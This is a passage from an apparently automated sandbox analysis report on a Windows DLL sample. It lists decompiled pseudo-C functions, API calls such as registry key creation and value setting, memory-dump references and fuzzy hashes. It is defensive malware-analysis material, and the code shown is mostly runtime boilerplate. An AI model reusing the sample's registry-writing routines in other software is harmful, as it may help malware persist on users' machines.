                                                                                                                                                  0x677041c7
                                                                                                                                                  0x677041d1
                                                                                                                                                  0x677041d9
                                                                                                                                                  0x677041dc
                                                                                                                                                  0x677041e1
                                                                                                                                                  0x677041e4
                                                                                                                                                  0x677041e4
                                                                                                                                                  0x677041ea
                                                                                                                                                  0x677041f9
                                                                                                                                                  0x67704202
                                                                                                                                                  0x6770420a
                                                                                                                                                  0x6770420d
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770420f
                                                                                                                                                  0x67704212
                                                                                                                                                  0x6770421a
                                                                                                                                                  0x6770421d
                                                                                                                                                  0x67704224
                                                                                                                                                  0x67704227
                                                                                                                                                  0x67704230
                                                                                                                                                  0x67704243
                                                                                                                                                  0x67704253
                                                                                                                                                  0x67704258
                                                                                                                                                  0x6770425b
                                                                                                                                                  0x6770425e
                                                                                                                                                  0x67704283
                                                                                                                                                  0x67704288
                                                                                                                                                  0x6770428d
                                                                                                                                                  0x67704292
                                                                                                                                                  0x67704295
                                                                                                                                                  0x67704297
                                                                                                                                                  0x67704297
                                                                                                                                                  0x6770429d
                                                                                                                                                  0x67704260
                                                                                                                                                  0x67704263
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67704263
                                                                                                                                                  0x6770425e
                                                                                                                                                  0x67704227
                                                                                                                                                  0x677041fb
                                                                                                                                                  0x677041fb
                                                                                                                                                  0x677041fb
                                                                                                                                                  0x677042cd

                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.577887869.0000000067701000.00000020.00020000.sdmp, Offset: 67700000, based on PE: true
                                                                                                                                                  • Associated: 00000002.00000002.577869241.0000000067700000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577922404.0000000067711000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577942811.0000000067716000.00000004.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577960544.000000006771A000.00000002.00020000.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: free$FolderPath_vswprintf_s_lmallocswprintf
                                                                                                                                                  • String ID: %s%s%s
                                                                                                                                                  • API String ID: 841784260-3094730333
                                                                                                                                                  • Opcode ID: 4af7a3d961411fd5c07de36f13ce0af50d421bc0a13b4e17cd160190457b9bde
                                                                                                                                                  • Instruction ID: 6a2f238361a6bbe97b97e0a6882f61f3951e1c89483120f8b500939ce9452bd6
                                                                                                                                                  • Opcode Fuzzy Hash: 4af7a3d961411fd5c07de36f13ce0af50d421bc0a13b4e17cd160190457b9bde
                                                                                                                                                  • Instruction Fuzzy Hash: 1921D171308B8195EE10CB20A61874A73D5FB5EBE8F844722EE6D47B98DF38C1068300
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 67705F9C, Relevance: 12.1, APIs: 8, Instructions: 81registryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • RegOpenKeyExW.ADVAPI32(?,?,?,?,?,?,00000000,00000000,00000000,677023B7), ref: 67705FF8
                                                                                                                                                  • RegCreateKeyExW.ADVAPI32 ref: 6770602E
                                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,00000000,00000000,00000000,677023B7), ref: 6770603D
                                                                                                                                                  • RegOpenKeyExW.ADVAPI32(?,?,?,?,?,?,00000000,00000000,00000000,677023B7), ref: 67706061
                                                                                                                                                  • RegSetValueExW.ADVAPI32(?,?,?,?,?,?,00000000,00000000,00000000,677023B7), ref: 6770608B
                                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,00000000,00000000,00000000,677023B7), ref: 67706098
                                                                                                                                                  • free.LIBCMT ref: 677060A7
                                                                                                                                                  • free.LIBCMT ref: 677060AF
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.577887869.0000000067701000.00000020.00020000.sdmp, Offset: 67700000, based on PE: true
                                                                                                                                                  • Associated: 00000002.00000002.577869241.0000000067700000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577922404.0000000067711000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577942811.0000000067716000.00000004.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577960544.000000006771A000.00000002.00020000.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CloseOpenfree$CreateValue
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1620756133-0
                                                                                                                                                  • Opcode ID: cfe014ce0333b35e4bbe2a5f9010fc02608ad0ae381ba46548dd32f91fa187bd
                                                                                                                                                  • Instruction ID: ace0487571e6b35fb4b60b4f514a1c981a7cc8366533301350a6c897aac70a5c
                                                                                                                                                  • Opcode Fuzzy Hash: cfe014ce0333b35e4bbe2a5f9010fc02608ad0ae381ba46548dd32f91fa187bd
                                                                                                                                                  • Instruction Fuzzy Hash: C8318176719B8086EB10CF26F954B0A63E4F788BC8F544125EE8947B18EF3DC2458B00
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 6770CEC8, Relevance: 12.1, APIs: 8, Instructions: 59COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 59%
                                                                                                                                                  			E6770CEC8(void* __ecx, void* __edx, intOrPtr* __rax, long long __rbx, void* __rcx, void* __rdx, long long __rdi, long long __rsi, void* __rbp, void* __r8, void* __r9, long long _a8, long long _a16, long long _a24) {
				void* _t15;
				int _t16;
				void* _t28;
				intOrPtr* _t31;
				void* _t33;
				long long _t34;
				void* _t36;
				signed long long _t43;

				_t45 = __rsi;
				_t36 = __rcx;
				_t31 = __rax;
				_a8 = __rbx;
				_a16 = __rsi;
				_a24 = __rdi;
				_t33 = __ecx;
				_t28 = 1;
				_t29 =  *0x67717990;
				if( *0x67717990 == 0) {
					E67708C4C(__ecx, __rdx, __rsi, __r8, __r9);
					_t4 = _t45 + 0x1d; // 0x1e
					E677089EC(_t4, __edx, _t29, _t33, __rdx, __rsi, __rbp, __r9);
					E67708658();
				}
				_t43 = _t33 + _t33;
				if( *((long long*)(0x67716b70 + _t43 * 8)) == 0) {
					E6770C0CC(_t33, _t36, _t43, _t45);
					_t34 = _t31;
					__eflags = _t31;
					if(_t31 != 0) {
						E6770CFB0();
						__eflags =  *((long long*)(0x67716b70 + _t43 * 8));
						if( *((long long*)(0x67716b70 + _t43 * 8)) != 0) {
							free();
						} else {
							_t16 = InitializeCriticalSectionAndSpinCount();
							__eflags = _t16;
							if(_t16 != 0) {
								 *((long long*)(0x67716b70 + _t43 * 8)) = _t34;
							} else {
								free();
								E6770851C(_t31);
								 *_t31 = 0xc;
								_t28 = 0;
							}
						}
						LeaveCriticalSection();
						goto L3;
					}
					E6770851C(_t31);
					 *_t31 = 0xc;
					_t15 = 0;
					goto L12;
				} else {
					L3:
					_t15 = _t28;
					L12:
					return _t15;
				}
			}











                                                                                                                                                  0x6770cec8
                                                                                                                                                  0x6770cec8
                                                                                                                                                  0x6770cec8
                                                                                                                                                  0x6770cec8
                                                                                                                                                  0x6770cecd
                                                                                                                                                  0x6770ced2
                                                                                                                                                  0x6770cedd
                                                                                                                                                  0x6770cee0
                                                                                                                                                  0x6770cee5
                                                                                                                                                  0x6770ceed
                                                                                                                                                  0x6770ceef
                                                                                                                                                  0x6770cef4
                                                                                                                                                  0x6770cef7
                                                                                                                                                  0x6770cf01
                                                                                                                                                  0x6770cf01
                                                                                                                                                  0x6770cf09
                                                                                                                                                  0x6770cf19
                                                                                                                                                  0x6770cf24
                                                                                                                                                  0x6770cf29
                                                                                                                                                  0x6770cf2c
                                                                                                                                                  0x6770cf2f
                                                                                                                                                  0x6770cf45
                                                                                                                                                  0x6770cf4e
                                                                                                                                                  0x6770cf54
                                                                                                                                                  0x6770cf83
                                                                                                                                                  0x6770cf56
                                                                                                                                                  0x6770cf5b
                                                                                                                                                  0x6770cf61
                                                                                                                                                  0x6770cf63
                                                                                                                                                  0x6770cf7c
                                                                                                                                                  0x6770cf65
                                                                                                                                                  0x6770cf68
                                                                                                                                                  0x6770cf6d
                                                                                                                                                  0x6770cf72
                                                                                                                                                  0x6770cf78
                                                                                                                                                  0x6770cf78
                                                                                                                                                  0x6770cf63
                                                                                                                                                  0x6770cf90
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770cf90
                                                                                                                                                  0x6770cf31
                                                                                                                                                  0x6770cf36
                                                                                                                                                  0x6770cf3c
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770cf1b
                                                                                                                                                  0x6770cf1b
                                                                                                                                                  0x6770cf1b
                                                                                                                                                  0x6770cf98
                                                                                                                                                  0x6770cfad
                                                                                                                                                  0x6770cfad

                                                                                                                                                  APIs
                                                                                                                                                  • _FF_MSGBANNER.LIBCMT ref: 6770CEEF
                                                                                                                                                    • Part of subcall function 67708C4C: _set_error_mode.LIBCMT ref: 67708C55
                                                                                                                                                    • Part of subcall function 67708C4C: _set_error_mode.LIBCMT ref: 67708C64
                                                                                                                                                    • Part of subcall function 677089EC: _set_error_mode.LIBCMT ref: 67708A31
                                                                                                                                                    • Part of subcall function 677089EC: _set_error_mode.LIBCMT ref: 67708A42
                                                                                                                                                    • Part of subcall function 677089EC: GetModuleFileNameW.KERNEL32 ref: 67708AA4
                                                                                                                                                    • Part of subcall function 67708658: ExitProcess.KERNEL32 ref: 67708667
                                                                                                                                                    • Part of subcall function 6770C0CC: malloc.LIBCMT ref: 6770C0F7
                                                                                                                                                    • Part of subcall function 6770C0CC: Sleep.KERNEL32(?,?,?,6770CF29,?,?,?,6770CFD3,?,?,00000000,67708D5D,?,?,00000000,67708E14), ref: 6770C10A
                                                                                                                                                  • _errno.LIBCMT ref: 6770CF31
                                                                                                                                                  • _lock.LIBCMT ref: 6770CF45
                                                                                                                                                  • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,?,6770CFD3,?,?,00000000,67708D5D,?,?,00000000,67708E14,?,?,?,67708525), ref: 6770CF5B
                                                                                                                                                  • free.LIBCMT ref: 6770CF68
                                                                                                                                                  • _errno.LIBCMT ref: 6770CF6D
                                                                                                                                                  • LeaveCriticalSection.KERNEL32(?,?,?,6770CFD3,?,?,00000000,67708D5D,?,?,00000000,67708E14,?,?,?,67708525), ref: 6770CF90
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.577887869.0000000067701000.00000020.00020000.sdmp, Offset: 67700000, based on PE: true
                                                                                                                                                  • Associated: 00000002.00000002.577869241.0000000067700000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577922404.0000000067711000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577942811.0000000067716000.00000004.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577960544.000000006771A000.00000002.00020000.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _set_error_mode$CriticalSection_errno$CountExitFileInitializeLeaveModuleNameProcessSleepSpin_lockfreemalloc
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 113790786-0
                                                                                                                                                  • Opcode ID: 08beffc20f475e4a08b0aae95f31ec66667dc2a7af6fea9dc97965f20f427859
                                                                                                                                                  • Instruction ID: 80782e181c0191ebcaf817a7a0d47435e7f3185d78f72a0c11adf777c45b8fcd
                                                                                                                                                  • Opcode Fuzzy Hash: 08beffc20f475e4a08b0aae95f31ec66667dc2a7af6fea9dc97965f20f427859
                                                                                                                                                  • Instruction Fuzzy Hash: B12106F22496408AE7009B20E72836A73E5F74D789F881635EB4947784CF7CE4408323
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 677060CC, Relevance: 12.0, APIs: 8, Instructions: 47stringCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 29%
                                                                                                                                                  			E677060CC(void* __ecx, void* __edx, void* __edi, void* __esp, void* __eflags, long long __rbx, void* __rdx, void* __r8, void* __r9, void* _a12, long long _a24) {
				signed long long _v24;
				signed int _v36;
				void* _v280;
				signed long long _t38;
				long long _t41;
				void* _t62;

				_t41 = __rbx;
				_a24 = __rbx;
				_t38 =  *0x67716000; // 0x9b7b11e8241
				_v24 = _t38 ^ _t62 - 0x00000130;
				E67703038(__ecx + 0x1098d, __edi, __esp, __rbx);
				lstrcpyA(??, ??);
				free(??);
				lstrcatA(??, ??);
				_t5 = _t41 + 0xdc6b; // 0xdc6b
				E67703038(_t5, __edi, __esp, _t41);
				lstrcatA(??, ??);
				free(??);
				lstrlenA(??);
				malloc(??);
				lstrcpyA(??, ??);
				memset(__edi, 0, 0xf9 << 0);
				return E67706F80(0, _v36 ^ _t62 - 0x00000130);
			}









                                                                                                                                                  0x677060cc
                                                                                                                                                  0x677060cc
                                                                                                                                                  0x677060d9
                                                                                                                                                  0x677060e3
                                                                                                                                                  0x677060f3
                                                                                                                                                  0x67706103
                                                                                                                                                  0x6770610c
                                                                                                                                                  0x6770611d
                                                                                                                                                  0x67706123
                                                                                                                                                  0x67706129
                                                                                                                                                  0x67706139
                                                                                                                                                  0x67706142
                                                                                                                                                  0x6770614c
                                                                                                                                                  0x67706157
                                                                                                                                                  0x67706167
                                                                                                                                                  0x67706179
                                                                                                                                                  0x6770619e

                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 67703038: wsprintfA.USER32 ref: 67703066
                                                                                                                                                    • Part of subcall function 67703038: lstrlenA.KERNEL32 ref: 67703071
                                                                                                                                                    • Part of subcall function 67703038: malloc.LIBCMT ref: 6770307C
                                                                                                                                                    • Part of subcall function 67703038: lstrcpyA.KERNEL32 ref: 6770308C
                                                                                                                                                  • lstrcpyA.KERNEL32 ref: 67706103
                                                                                                                                                  • free.LIBCMT ref: 6770610C
                                                                                                                                                    • Part of subcall function 67706FA0: HeapFree.KERNEL32(?,?,00000000,67708E28,?,?,?,67708525,?,?,?,?,6770707E), ref: 67706FB6
                                                                                                                                                    • Part of subcall function 67706FA0: _errno.LIBCMT ref: 67706FC0
                                                                                                                                                    • Part of subcall function 67706FA0: GetLastError.KERNEL32(?,?,00000000,67708E28,?,?,?,67708525,?,?,?,?,6770707E), ref: 67706FC8
                                                                                                                                                  • lstrcatA.KERNEL32 ref: 6770611D
                                                                                                                                                  • lstrcatA.KERNEL32 ref: 67706139
                                                                                                                                                  • free.LIBCMT ref: 67706142
                                                                                                                                                  • lstrlenA.KERNEL32 ref: 6770614C
                                                                                                                                                  • malloc.LIBCMT ref: 67706157
                                                                                                                                                    • Part of subcall function 67706FE0: _FF_MSGBANNER.LIBCMT ref: 67707010
                                                                                                                                                    • Part of subcall function 67706FE0: RtlAllocateHeap.NTDLL(?,?,?,67703907,?,?,?,67703955,?,?,?,677042F0,?,?,?,67704207), ref: 67707035
                                                                                                                                                    • Part of subcall function 67706FE0: _callnewh.LIBCMT ref: 6770704E
                                                                                                                                                    • Part of subcall function 67706FE0: _errno.LIBCMT ref: 67707059
                                                                                                                                                    • Part of subcall function 67706FE0: _errno.LIBCMT ref: 67707064
                                                                                                                                                  • lstrcpyA.KERNEL32 ref: 67706167
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.577887869.0000000067701000.00000020.00020000.sdmp, Offset: 67700000, based on PE: true
                                                                                                                                                  • Associated: 00000002.00000002.577869241.0000000067700000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577922404.0000000067711000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577942811.0000000067716000.00000004.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577960544.000000006771A000.00000002.00020000.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _errnolstrcpy$Heapfreelstrcatlstrlenmalloc$AllocateErrorFreeLast_callnewhwsprintf
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 499640220-0
                                                                                                                                                  • Opcode ID: 9db938e992fc3f5ba8220cdf8902caf1827cce07a84c4b0ee9e3f8439dfd04c1
                                                                                                                                                  • Instruction ID: b60390d8319849b5c1ef8a84482c2c814da6737d40b5b81b1361a9c705ca10e4
                                                                                                                                                  • Opcode Fuzzy Hash: 9db938e992fc3f5ba8220cdf8902caf1827cce07a84c4b0ee9e3f8439dfd04c1
                                                                                                                                                  • Instruction Fuzzy Hash: 2611426121968585DF20DB21F9683A9A3E2F79CBCCFC44125DA8E4B718EF2CC259CB00
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 6770FF34, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 116COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 85%
                                                                                                                                                  			E6770FF34(void* __ebx, void* __ecx, void* __edx, void* __esi, long long __rax, long long __rbx, signed long long* __rdx, long long __rbp, void* __r8, void* __r9, void* __r10, void* __r11, long long _a8, signed int _a16, long long _a24) {
				signed long long _t42;
				signed int _t45;
				signed int _t47;
				void* _t52;
				void* _t58;
				signed int _t65;
				signed long long _t68;
				void* _t69;
				void* _t70;
				signed long long _t75;
				signed long long* _t79;
				void* _t82;
				signed long long _t87;
				signed long long _t88;
				void* _t94;
				void* _t95;
				void* _t96;
				void* _t97;

				_t97 = __r11;
				_t96 = __r10;
				_t95 = __r9;
				_t94 = __r8;
				_t74 = __rax;
				_t69 = __esi;
				_t58 = __ebx;
				_a8 = __rbx;
				_a24 = __rbp;
				r12d = __ecx;
				_t81 = __rdx;
				_t79 = __rdx;
				_t42 = E6770E5F4(__edx, __rax, __rdx);
				_t65 =  *(__rdx + 0x18);
				_t88 = _t42;
				if((_t65 & 0x00000082) != 0) {
					if((_t65 & 0x00000040) == 0) {
						_t68 = 0;
						if((_t65 & 0x00000001) == 0) {
							L9:
							_t79[1] = _t68;
							_t45 = _t79[3] & 0xffffffef | 0x00000002;
							_t79[3] = _t45;
							if((_t45 & 0x0000010c) == 0) {
								_t52 = E6770E3E0(_t45);
								_t74 = _t74 + 0x30;
								if(_t79 == _t74) {
									L12:
									if(E6770E380(_t69, _t65, _t74) == 0) {
										goto L13;
									}
								} else {
									E6770E3E0(_t52);
									if(_t79 != _t74) {
										L13:
										_t81 = _t79;
										E6770E32C(_t74, _t79);
									} else {
										goto L12;
									}
								}
							}
							if((_t79[3] & 0x00000108) == 0) {
								_t70 = 2;
								r8d = 2;
								_a16 = r12w;
								_t68 = E6770E24C(_t58, _t69, _t65, _t68, _t74, _t79, _t81,  &_a16, _t94, _t95, _t96, _t97);
								goto L26;
							} else {
								_t87 = _t79[2];
								_t70 =  *_t79 - _t79[2];
								_t75 = _t87 + 2;
								 *_t79 = _t75;
								_t79[1] = _t79[4] - 2;
								if(_t70 <= 0) {
									if(_t69 == 0xffffffff || _t69 == 0xfffffffe) {
										_t82 = 0x67716b10;
									} else {
										_t87 = 0x67719900;
										_t75 = _t88 >> 5;
										_t82 = _t88 * 0x58 +  *((intOrPtr*)(0x67719900 + _t75 * 8));
									}
									if(( *(_t82 + 8) & 0x00000020) == 0) {
										goto L24;
									} else {
										_t36 = _t87 + 2; // 0x2
										r8d = _t36;
										E6770DA08(_t58, _t69, 0, _t68, _t75, _t79, _t82, _t87, _t94);
										if(_t75 == 0xffffffff) {
											goto L2;
										} else {
											goto L24;
										}
									}
								} else {
									r8d = _t70;
									_t68 = E6770E24C(_t58, _t69, _t65, _t68, _t75, _t79, _t81, _t87, _t94, _t95, _t96, _t97);
									L24:
									 *(_t79[2]) = r12w;
									L26:
									if(_t68 != _t70) {
										goto L2;
									} else {
										_t47 = r12w & 0xffffffff;
									}
								}
							}
						} else {
							 *((intOrPtr*)(__rdx + 8)) = 0;
							if((_t65 & 0x00000010) == 0) {
								 *(__rdx + 0x18) = _t65 | 0x00000020;
								goto L3;
							} else {
								_t74 =  *((intOrPtr*)(__rdx + 0x10));
								_t65 = _t65 & 0xfffffffe;
								 *((long long*)(__rdx)) = _t74;
								 *(__rdx + 0x18) = _t65;
								goto L9;
							}
						}
					} else {
						E6770851C(__rax);
						 *((intOrPtr*)(__rax)) = 0x22;
						goto L2;
					}
				} else {
					E6770851C(__rax);
					 *((intOrPtr*)(__rax)) = 9;
					L2:
					_t79[3] = _t79[3] | 0x00000020;
					L3:
					_t47 = 0xffff;
				}
				return _t47;
			}





















                                                                                                                                                  0x6770ff34
                                                                                                                                                  0x6770ff34
                                                                                                                                                  0x6770ff34
                                                                                                                                                  0x6770ff34
                                                                                                                                                  0x6770ff34
                                                                                                                                                  0x6770ff34
                                                                                                                                                  0x6770ff34
                                                                                                                                                  0x6770ff34
                                                                                                                                                  0x6770ff39
                                                                                                                                                  0x6770ff46
                                                                                                                                                  0x6770ff49
                                                                                                                                                  0x6770ff4c
                                                                                                                                                  0x6770ff4f
                                                                                                                                                  0x6770ff54
                                                                                                                                                  0x6770ff57
                                                                                                                                                  0x6770ff5d
                                                                                                                                                  0x6770ff7b
                                                                                                                                                  0x6770ff8a
                                                                                                                                                  0x6770ff8f
                                                                                                                                                  0x6770ffaa
                                                                                                                                                  0x6770ffad
                                                                                                                                                  0x6770ffb3
                                                                                                                                                  0x6770ffb6
                                                                                                                                                  0x6770ffbe
                                                                                                                                                  0x6770ffc0
                                                                                                                                                  0x6770ffc5
                                                                                                                                                  0x6770ffcc
                                                                                                                                                  0x6770ffdc
                                                                                                                                                  0x6770ffe5
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770ffce
                                                                                                                                                  0x6770ffce
                                                                                                                                                  0x6770ffda
                                                                                                                                                  0x6770ffe7
                                                                                                                                                  0x6770ffe7
                                                                                                                                                  0x6770ffea
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770ffda
                                                                                                                                                  0x6770ffcc
                                                                                                                                                  0x6770fff6
                                                                                                                                                  0x67710088
                                                                                                                                                  0x67710094
                                                                                                                                                  0x67710097
                                                                                                                                                  0x677100a2
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770fffc
                                                                                                                                                  0x6770fffe
                                                                                                                                                  0x67710002
                                                                                                                                                  0x67710005
                                                                                                                                                  0x67710009
                                                                                                                                                  0x67710012
                                                                                                                                                  0x67710017
                                                                                                                                                  0x67710035
                                                                                                                                                  0x6771005a
                                                                                                                                                  0x6771003c
                                                                                                                                                  0x67710042
                                                                                                                                                  0x6771004c
                                                                                                                                                  0x67710054
                                                                                                                                                  0x67710054
                                                                                                                                                  0x67710065
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67710067
                                                                                                                                                  0x6771006b
                                                                                                                                                  0x6771006b
                                                                                                                                                  0x6771006f
                                                                                                                                                  0x67710078
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67710078
                                                                                                                                                  0x67710019
                                                                                                                                                  0x67710019
                                                                                                                                                  0x67710023
                                                                                                                                                  0x6771007e
                                                                                                                                                  0x67710082
                                                                                                                                                  0x677100a4
                                                                                                                                                  0x677100a6
                                                                                                                                                  0x00000000
                                                                                                                                                  0x677100ac
                                                                                                                                                  0x677100ac
                                                                                                                                                  0x677100ac
                                                                                                                                                  0x677100a6
                                                                                                                                                  0x67710017
                                                                                                                                                  0x6770ff91
                                                                                                                                                  0x6770ff91
                                                                                                                                                  0x6770ff97
                                                                                                                                                  0x6771002a
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770ff9d
                                                                                                                                                  0x6770ff9d
                                                                                                                                                  0x6770ffa1
                                                                                                                                                  0x6770ffa4
                                                                                                                                                  0x6770ffa7
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770ffa7
                                                                                                                                                  0x6770ff97
                                                                                                                                                  0x6770ff7d
                                                                                                                                                  0x6770ff7d
                                                                                                                                                  0x6770ff82
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770ff82
                                                                                                                                                  0x6770ff5f
                                                                                                                                                  0x6770ff5f
                                                                                                                                                  0x6770ff64
                                                                                                                                                  0x6770ff6a
                                                                                                                                                  0x6770ff6a
                                                                                                                                                  0x6770ff6e
                                                                                                                                                  0x6770ff6e
                                                                                                                                                  0x6770ff6e
                                                                                                                                                  0x677100c2

                                                                                                                                                  APIs
                                                                                                                                                  • _fileno.LIBCMT ref: 6770FF4F
                                                                                                                                                    • Part of subcall function 6770E5F4: _errno.LIBCMT ref: 6770E5FD
                                                                                                                                                    • Part of subcall function 6770E5F4: _invalid_parameter_noinfo.LIBCMT ref: 6770E608
                                                                                                                                                  • _errno.LIBCMT ref: 6770FF5F
                                                                                                                                                  • _errno.LIBCMT ref: 6770FF7D
                                                                                                                                                  • _isatty.LIBCMT ref: 6770FFDE
                                                                                                                                                  • _getbuf.LIBCMT ref: 6770FFEA
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.577887869.0000000067701000.00000020.00020000.sdmp, Offset: 67700000, based on PE: true
                                                                                                                                                  • Associated: 00000002.00000002.577869241.0000000067700000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577922404.0000000067711000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577942811.0000000067716000.00000004.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577960544.000000006771A000.00000002.00020000.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _errno$_fileno_getbuf_invalid_parameter_noinfo_isatty
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2574049805-3916222277
                                                                                                                                                  • Opcode ID: 3b54a1f90ba21cdd0e14423be38b348ed26c3bfb354c488ae1434583e5a108e4
                                                                                                                                                  • Instruction ID: b354540ac2d96ef92d9df1ea25ae766af7fc28d8428483a6dab661b00687a5e6
                                                                                                                                                  • Opcode Fuzzy Hash: 3b54a1f90ba21cdd0e14423be38b348ed26c3bfb354c488ae1434583e5a108e4
                                                                                                                                                  • Instruction Fuzzy Hash: 444113F2214B0489DB049F39D68131D77A1E78DFA8F184625DB68473D4EB79C8A2CB85
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 677087EC, Relevance: 10.6, APIs: 7, Instructions: 98COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • _lock.LIBCMT ref: 67708815
                                                                                                                                                    • Part of subcall function 6770CFB0: _amsg_exit.LIBCMT ref: 6770CFDA
                                                                                                                                                  • DecodePointer.KERNEL32(?,?,?,?,?,?,00000000,677089BD,?,?,00000000,6770CFDF,?,?,00000000,67708D5D), ref: 67708848
                                                                                                                                                  • DecodePointer.KERNEL32(?,?,?,?,?,?,00000000,677089BD,?,?,00000000,6770CFDF,?,?,00000000,67708D5D), ref: 67708866
                                                                                                                                                  • DecodePointer.KERNEL32(?,?,?,?,?,?,00000000,677089BD,?,?,00000000,6770CFDF,?,?,00000000,67708D5D), ref: 677088A6
                                                                                                                                                  • DecodePointer.KERNEL32(?,?,?,?,?,?,00000000,677089BD,?,?,00000000,6770CFDF,?,?,00000000,67708D5D), ref: 677088C0
                                                                                                                                                  • DecodePointer.KERNEL32(?,?,?,?,?,?,00000000,677089BD,?,?,00000000,6770CFDF,?,?,00000000,67708D5D), ref: 677088D0
                                                                                                                                                  • ExitProcess.KERNEL32 ref: 6770895C
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.577887869.0000000067701000.00000020.00020000.sdmp, Offset: 67700000, based on PE: true
                                                                                                                                                  • Associated: 00000002.00000002.577869241.0000000067700000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577922404.0000000067711000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577942811.0000000067716000.00000004.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577960544.000000006771A000.00000002.00020000.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: DecodePointer$ExitProcess_amsg_exit_lock
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3411037476-0
                                                                                                                                                  • Opcode ID: 7521ab94d42d538c61c0f4b7c5a7e6a0a1eb2efc61f9b4365a89d0ea920ec535
                                                                                                                                                  • Instruction ID: 7a71b7da857272ac2d161d29e58ec847c02b236836fe0b1c5f27132f87d95913
                                                                                                                                                  • Opcode Fuzzy Hash: 7521ab94d42d538c61c0f4b7c5a7e6a0a1eb2efc61f9b4365a89d0ea920ec535
                                                                                                                                                  • Instruction Fuzzy Hash: 323148B122EB4085E640DB11FA4432962E6F79CB9CF980535DA8D47B64EF79C065C702
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 67702634, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 72processCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 59%
                                                                                                                                                  			E67702634(void* __ecx, void* __edi, void* __esp, long long __rbx, long long __rcx, void* __rdx, long long __rsi, void* __r8) {
				int _t35;
				intOrPtr _t43;
				void* _t54;
				signed int _t55;
				void* _t57;
				signed long long _t60;
				signed long long _t61;
				void* _t74;
				WCHAR* _t75;
				struct _SECURITY_ATTRIBUTES* _t81;
				void* _t82;
				void* _t84;
				signed long long _t85;
				WCHAR* _t91;

